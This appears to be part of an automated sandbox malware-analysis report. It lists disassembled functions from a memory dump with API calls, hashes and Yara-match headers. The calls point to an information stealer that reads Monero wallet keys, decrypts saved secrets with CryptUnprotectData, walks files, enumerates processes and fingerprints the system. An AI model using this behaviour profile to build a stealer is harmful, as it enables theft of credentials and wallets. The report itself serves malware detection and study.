                                        • Opcode Fuzzy Hash: e8bae0038d4748474ad9f89c3fac5a585d4c5a02c772c76ba9a8c7aa7f9b10f3
                                        • Instruction Fuzzy Hash: 3C417E71944218ABCF24DB94DC99BEEB374FF58700F5041D9E00A66281DB346F88CFA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: -?v$8KZ^$AOC?$QF'N$RPOY$j9UF$Q*4
                                        • API String ID: 0-1770485053
                                        • Opcode ID: 2310ca11c32512910d0cd15c8819ef24ebedaecdd17a21226bad3f5a3801e111
                                        • Instruction ID: 85ef224d776762f501d17abc1e6337b3c05ae9bcfd6d36c8fab1fcb3cf8ba393
                                        • Opcode Fuzzy Hash: 2310ca11c32512910d0cd15c8819ef24ebedaecdd17a21226bad3f5a3801e111
                                        • Instruction Fuzzy Hash: 53B2F5F3A0C2009FE708AE29EC9567AFBE9EF94320F16493DE6C5C3744E63558418697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: *w??$,o~$>Pw"$]CI$]h1_$v\~$KWV
                                        • API String ID: 0-3831577768
                                        • Opcode ID: 7cbf97926c21698546e53b586a20138e01a74374410c3ea259355f5c0d3bd06c
                                        • Instruction ID: 9b107035965083f4dbc7310dbbe0b3904ea8a274674b3da87250f20fac278bad
                                        • Opcode Fuzzy Hash: 7cbf97926c21698546e53b586a20138e01a74374410c3ea259355f5c0d3bd06c
                                        • Instruction Fuzzy Hash: 9CB2E8F36082009FE704AE2DEC8567ABBE5EFD4720F1A893DE6C4C7744EA3558058697
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,001A0D79), ref: 0018E5A2
                                        • StrCmpCA.SHLWAPI(?,001A15F0), ref: 0018E5F2
                                        • StrCmpCA.SHLWAPI(?,001A15F4), ref: 0018E608
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0018ECDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 433455689-1173974218
                                        • Opcode ID: b7178566b6c4deeb5af716e4a6edb239d504c1731b8002f723c046b8cd5f9119
                                        • Instruction ID: 0466575b01273bac8cf8d688c0607e84044bd074440d023330b812cef7f23536
                                        • Opcode Fuzzy Hash: b7178566b6c4deeb5af716e4a6edb239d504c1731b8002f723c046b8cd5f9119
                                        • Instruction Fuzzy Hash: E212ED72A141189BCF19FB60DDA6AED7379AF65300F8045A9B50B66091EF306B4CCFD2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: &m}$(4g$4b>-$]={>$g{$qus~
                                        • API String ID: 0-1412593970
                                        • Opcode ID: 4c11713fac40f0ff702655c788483812e468d3ebbd7c787f107e68ab3b972cf9
                                        • Instruction ID: 81640a5ed91fbcfb8c760ac6d6b5cd05723df95a76ac94ae7a2e189ed530fbed
                                        • Opcode Fuzzy Hash: 4c11713fac40f0ff702655c788483812e468d3ebbd7c787f107e68ab3b972cf9
                                        • Instruction Fuzzy Hash: 9272D4F390C204AFE7046E29DC8576ABBE9EF94720F1A493DEAC4C3744E63598418797
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: #G{w$E~}$Nd,x$T~3o$Tov$e4uo
                                        • API String ID: 0-4046128984
                                        • Opcode ID: 6e9735fe184f11771c082b8102dd4df3b79f2109ec477cca8f6faa81c3d89e94
                                        • Instruction ID: 9d1ccc6d7d1f2d7b9b0c4e7ecbfdc28a7a577becd4c29259986c38f4907d986d
                                        • Opcode Fuzzy Hash: 6e9735fe184f11771c082b8102dd4df3b79f2109ec477cca8f6faa81c3d89e94
                                        • Instruction Fuzzy Hash: 1332E6F360C200AFE704AE2DEC8577ABBE5EF94320F16893DE6C583744E67598058697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ".|$Ks$=$Mj^$^Uvn$hzR{
                                        • API String ID: 0-4159268604
                                        • Opcode ID: a73d7b9f471ce8fc837e728cbdc97d39de57d6375dcad2387302f42db2dae3eb
                                        • Instruction ID: 8077d5fa77197c815cad94dc7116f587e03ae1144879701337ffff0814c54d21
                                        • Opcode Fuzzy Hash: a73d7b9f471ce8fc837e728cbdc97d39de57d6375dcad2387302f42db2dae3eb
                                        • Instruction Fuzzy Hash: C7B24AF360C2049FE3086E2DEC8567ABBE5EF94720F1A463DE6C5C7740EA3598058796
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: +Tgv$A-}O$B,}O$g?$w-:
                                        • API String ID: 0-3034431403
                                        • Opcode ID: e02bd54f123f0387664a70a7b1c3b52b8fe914c0e5a28fb543481dc284f654bc
                                        • Instruction ID: d697a3e3c77355f6e2d2c72975326b698227c59837e3ed1a0addab0b49246f80
                                        • Opcode Fuzzy Hash: e02bd54f123f0387664a70a7b1c3b52b8fe914c0e5a28fb543481dc284f654bc
                                        • Instruction Fuzzy Hash: C1B2F8F3A0C2049FE3046E2DEC8566AFBEAEFD4320F1A853DE6C4C7744E67558058696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 6:n$]EyM$]pg${3g${m6_
                                        • API String ID: 0-620376452
                                        • Opcode ID: abadf48c459c55a1933d33dc04c9fbf46968a6adb13e17aedc243708a5260a11
                                        • Instruction ID: ed0f94b571a88ca5d4359264fbac8b4f1aa450b4acc5fe65a90f0be9a7ce5efa
                                        • Opcode Fuzzy Hash: abadf48c459c55a1933d33dc04c9fbf46968a6adb13e17aedc243708a5260a11
                                        • Instruction Fuzzy Hash: 62B209F360C200AFE3046E29EC8567AF7E9EF94720F2A893DE5C5C7744E63598418696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: \u$\u${${$}$}
                                        • API String ID: 0-582841131
                                        • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction ID: 3288df32f7e6b286c7d844da34f0d8d9511b3707091c4b5fd3acba83598aecfb
                                        • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction Fuzzy Hash: 95416912E19FC9C5CB058B7544A02AEBFB22FE6210F6D82AEC4DD1F382C774414AD3A5
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0018C971
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0018C97C
                                        • lstrcat.KERNEL32(?,001A0B47), ref: 0018CA43
                                        • lstrcat.KERNEL32(?,001A0B4B), ref: 0018CA57
                                        • lstrcat.KERNEL32(?,001A0B4E), ref: 0018CA78
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        • API String ID: 189259977-0
                                        • Opcode ID: 6e839d182d3de373a83edee876e00fc8481b3a8ea8fa592b4b5fa0214357b907
                                        • Instruction ID: c786ee02c5c9b68f58d3f525c49feee0c90e56ac8fa8356e93b5268f58094e14
                                        • Opcode Fuzzy Hash: 6e839d182d3de373a83edee876e00fc8481b3a8ea8fa592b4b5fa0214357b907
                                        • Instruction Fuzzy Hash: 68416E7890421E9BDB14DFA0DD88BFEB7B8AB48704F0041B8F509A7281D7709B84CFA5
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 001872AD
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 001872B4
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001872E1
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00187304
                                        • LocalFree.KERNEL32(?), ref: 0018730E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        • Opcode ID: b021369bd0b2afb7d546888c329a4bea907d42791cce02bf47fbc125466d7f55
                                        • Instruction ID: a23952a9a0e5e5f4c1e98ebf2d87f64cbc978cffdd82f2b3ee5c239a716ecb96
                                        • Opcode Fuzzy Hash: b021369bd0b2afb7d546888c329a4bea907d42791cce02bf47fbc125466d7f55
                                        • Instruction Fuzzy Hash: 93014C75A44308BBDB10DFE4DC46FAE7778AB44B01F204064FB05AA2C1CBB0AA008B69
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001997AE
                                        • Process32First.KERNEL32(001A0ACE,00000128), ref: 001997C2
                                        • Process32Next.KERNEL32(001A0ACE,00000128), ref: 001997D7
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 001997EC
                                        • CloseHandle.KERNEL32(001A0ACE), ref: 0019980A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 6c18255a5069a6ec436c6d78324798e536cc2c78f5248f46b07b22dcb1faffc4
                                        • Instruction ID: fece44befc4073e649bc2dbe43f4ecfe765fa8ec06162779e9be443504fa558b
                                        • Opcode Fuzzy Hash: 6c18255a5069a6ec436c6d78324798e536cc2c78f5248f46b07b22dcb1faffc4
                                        • Instruction Fuzzy Hash: 9E01E975A14308ABDF24DFA4DD44BEDB7B8BB08701F1045ACE50996240EB70DA40CF50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: <7\h$huzx
                                        • API String ID: 0-2989614873
                                        • Opcode ID: e8dc66ebecccd7eafc5bf8ba452fd0316f4965e0d5a7ea873665f10710d640eb
                                        • Instruction ID: 14fdfd77b26c49b9bb83cc6f608b5f83d13b30865deffe0f264812898054a204
                                        • Opcode Fuzzy Hash: e8dc66ebecccd7eafc5bf8ba452fd0316f4965e0d5a7ea873665f10710d640eb
                                        • Instruction Fuzzy Hash: D063327A41EBD41ECB27CB3047B62A17F66BA1361031D49CEC8C18F5B3C7949A1AE356
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ^5;_$a"~g$bs$gw
                                        • API String ID: 0-3156686373
                                        • Opcode ID: ef4648dbf5707407cd21e1ce4bde377d99fc00e31f9355233cb08d5b3d287adc
                                        • Instruction ID: 8806c917dedba20908906467c6dcefab69d8936e56f3120d168673ad514e7572
                                        • Opcode Fuzzy Hash: ef4648dbf5707407cd21e1ce4bde377d99fc00e31f9355233cb08d5b3d287adc
                                        • Instruction Fuzzy Hash: ABB206F3A0C2049FE7046E2DEC8567AFBE5EF94720F1A493DEAC483744EA3558058697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ;k\$c_$c{63$q`_
                                        • API String ID: 0-679688097
                                        • Opcode ID: dee4a9b342781002ac60da8f6f0a11a47894909b161fa2ce4c29b9b6451bb774
                                        • Instruction ID: c6ba17ed3bf5bd8d9fdc30ad280ba4a6c6d2f39d9c68357d18c7d79cdf3df371
                                        • Opcode Fuzzy Hash: dee4a9b342781002ac60da8f6f0a11a47894909b161fa2ce4c29b9b6451bb774
                                        • Instruction Fuzzy Hash: 41A226F360C2049FE704AE2DEC8567AFBE9EB94720F1A4A3DE6C5C3740E63558058697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 9`]R$U%<;$cy$tmt
                                        • API String ID: 0-363399913
                                        • Opcode ID: 4f5d8f190c00fc34d2d1a33217d560f5709ff6340915a3a6b57a35b6fb834b15
                                        • Instruction ID: aa85730f46cb742e934df185cd304de7ce25dfd77016cd805e75245f631cf5e7
                                        • Opcode Fuzzy Hash: 4f5d8f190c00fc34d2d1a33217d560f5709ff6340915a3a6b57a35b6fb834b15
                                        • Instruction Fuzzy Hash: 3AA204F3A0C204AFE3046E2DEC8566AFBE9EF94720F16493DEAC4C3744E63559058697
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,001851D4,40000001,00000000,00000000,?,001851D4), ref: 00199050
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: daf8d3c2825b8104fd960fc94a56d55e82ff91d1ce1a4c96cda62701df22fd97
                                        • Instruction ID: acb41fe344def80111b156e9b8d5b78d6f094fbc442c0730ca360cfe057a8d25
                                        • Opcode Fuzzy Hash: daf8d3c2825b8104fd960fc94a56d55e82ff91d1ce1a4c96cda62701df22fd97
                                        • Instruction Fuzzy Hash: BB110674204208FFDF04CF58D885FAB37ADAF89711F148468FA298B251D772E941DBA5
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 0018A23F
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00184F3E,00000000,?), ref: 0018A251
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 0018A27A
                                        • LocalFree.KERNEL32(?,?,?,?,00184F3E,00000000,?), ref: 0018A28F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID:
                                        • API String ID: 4291131564-0
                                        • Opcode ID: 5825d8e42267a9252203bb3b7c7a7fee9e490c97d30d4c465348564ba01dc696
                                        • Instruction ID: 0210278b8133373082e42b384be83e490cf543c4dbc1d28532864eb30b7d5d65
                                        • Opcode Fuzzy Hash: 5825d8e42267a9252203bb3b7c7a7fee9e490c97d30d4c465348564ba01dc696
                                        • Instruction Fuzzy Hash: EE11A474240308AFEB11CF64DC95FAA77B6EB89B11F208499FD199B390C772EA41CB54
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001A0DE8,00000000,?), ref: 00197B40
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00197B47
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,001A0DE8,00000000,?), ref: 00197B54
                                        • wsprintfA.USER32 ref: 00197B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: 522ff954d5f6827ee8e578b95dec4ec5512676a1f4acf0540449b9c7a06b470d
                                        • Instruction ID: d182ac8562454f0d3eb54959ac8a4e3cf18d1a55bf0a77fed06ec69f43c9a092
                                        • Opcode Fuzzy Hash: 522ff954d5f6827ee8e578b95dec4ec5512676a1f4acf0540449b9c7a06b470d
                                        • Instruction Fuzzy Hash: 4911FEB2908219ABCB14DBD9ED45BBEB7F8EB4CB12F10416AF605A2280D7799940C774
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,011CE008,00000000,?,001A0DF8,00000000,?,00000000,00000000), ref: 00197BF3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00197BFA
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,011CE008,00000000,?,001A0DF8,00000000,?,00000000,00000000,?), ref: 00197C0D
                                        • wsprintfA.USER32 ref: 00197C47
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        • Opcode ID: d2b344473f2a18e03b41b262aa512a49d7abc87b8956dc75610d5e85417014bd
                                        • Instruction ID: d138f905c6c9e18f0ba124a53eb546c6361714edec3bf0c81f2da15d17b37349
                                        • Opcode Fuzzy Hash: d2b344473f2a18e03b41b262aa512a49d7abc87b8956dc75610d5e85417014bd
                                        • Instruction Fuzzy Hash: 8911A1B1909319EBEB208B54ED45FA9BB78FB44711F1043E5F61A932D0DB745A408B54
                                        APIs
                                        • CoCreateInstance.COMBASE(0019E120,00000000,00000001,0019E110,00000000), ref: 001939A8
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00193A00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
